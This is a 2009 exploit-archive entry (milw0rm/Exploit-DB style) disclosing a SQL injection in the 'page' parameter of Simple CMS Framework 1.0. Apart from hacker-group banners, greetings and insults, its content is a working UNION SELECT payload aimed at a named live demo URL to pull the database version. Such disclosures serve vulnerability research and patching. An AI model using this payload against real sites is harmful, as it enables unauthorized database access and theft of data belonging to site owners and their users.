Simple CMS Framework 1.0 - 'page' SQL Injection

EDB-ID:

9527

CVE:

N/A


Platform:

PHP

Published:

2009-08-26

==============================================================================
  ##  Hackteach.OrG ##
             

/ ___   )(  __   )/ ___   )
\/   )  || (  )  |\/   )  |
    /   )| | /   |    /   )
   /   / | (/ /) |   /   / 
  /   /  |   / | |  /   /  
 /   (_/\|  (__) | /   (_/\
(_______/(_______)(_______/
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  Simple CMS FrameWork <== 1.0 Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:             [ Hackteach.org ]
    [»] Script:              [ Simple CMS FrameWork ]
    [»] Language:            [ PHP ]
    [»] Home:                [ http://westlingit.com/cms.php ]
    [»] Founder:             [ Red-D3v1L < php-c0de@hotmail.com > SQL@Hotmail.eS < ]
    [»] Gr44tz to:           [ All member Hackteach.org/cc - Str0ke - sp3x ]
    [»] Fuck To :            [ Anti-trust << Big Big Big Lamer << ]
########################################################################

===[ Exploit SQL ]===  

 [»] [Path]/index.php?id=null&page=[SQL]

 [»] L1v3 d3m0 : 

http://dev.westlingit.com/simplecms/index.php?id=null&page=-0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19 


Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-26]